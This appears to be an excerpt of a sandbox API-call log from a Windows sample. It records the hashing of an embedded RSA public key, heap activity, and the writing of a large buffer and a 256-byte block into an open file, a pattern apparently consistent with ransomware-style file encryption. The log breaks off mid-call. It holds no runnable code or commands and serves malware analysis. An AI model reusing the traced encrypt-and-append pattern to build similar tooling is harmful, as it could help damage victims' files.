(lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2c4afd0 [0183.167] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.167] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.167] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.168] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.168] CryptHashData (hHash=0x2cbfa50, pbData=0x2c4afd0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.168] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.168] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.168] GetLastError () returned 0x0 [0183.168] SetLastError (dwErrCode=0x0) [0183.168] GetLastError () returned 0x0 [0183.168] SetLastError (dwErrCode=0x0) [0183.168] GetLastError () returned 0x0 [0183.168] SetLastError (dwErrCode=0x0) [0183.168] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.169] GetLastError () returned 0x0 [0183.169] SetLastError (dwErrCode=0x0) [0183.169] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.170] SetLastError (dwErrCode=0x0) [0183.170] GetLastError () returned 0x0 [0183.171] SetLastError (dwErrCode=0x0) [0183.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.171] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.171] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.171] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.172] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.172] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc960) returned 0x2d32670 [0183.172] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d309a0 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e600 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30958 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e618 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5d0 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e690 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6f0 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.173] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d3efd8 [0183.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d3f1f8 [0183.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0183.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f1f8 | out: hHeap=0x6a0000) returned 1 [0183.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e690 [0183.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0183.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6f0 [0183.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e5d0 [0183.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0183.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0183.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3efd8 | out: hHeap=0x6a0000) returned 1 [0183.176] GetCurrentThreadId () returned 0x264 [0183.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6cde70 [0183.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.177] GetCurrentThreadId () returned 0x264 [0183.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e690 [0183.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5d0 [0183.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6f0 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e660 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6a8 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e678 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e648 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6c0 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e648 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e5d0 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3efd8 [0183.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3f1e8 [0183.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d3f400 [0183.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f1e8 | out: hHeap=0x6a0000) returned 1 [0183.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f400 | out: hHeap=0x6a0000) returned 1 [0183.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e660 | out: hHeap=0x6a0000) returned 1 [0183.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e618 | out: hHeap=0x6a0000) returned 1 [0183.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30958 | out: hHeap=0x6a0000) returned 1 [0183.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3efd8 | out: hHeap=0x6a0000) returned 1 [0183.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.188] WriteFile (in: hFile=0x584, lpBuffer=0x2d32670*, nNumberOfBytesToWrite=0xc954, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d32670*, lpNumberOfBytesWritten=0x30ffb14*=0xc954, lpOverlapped=0x0) returned 1 [0183.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0183.189] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc959, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.189] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d32670 [0183.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d32670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 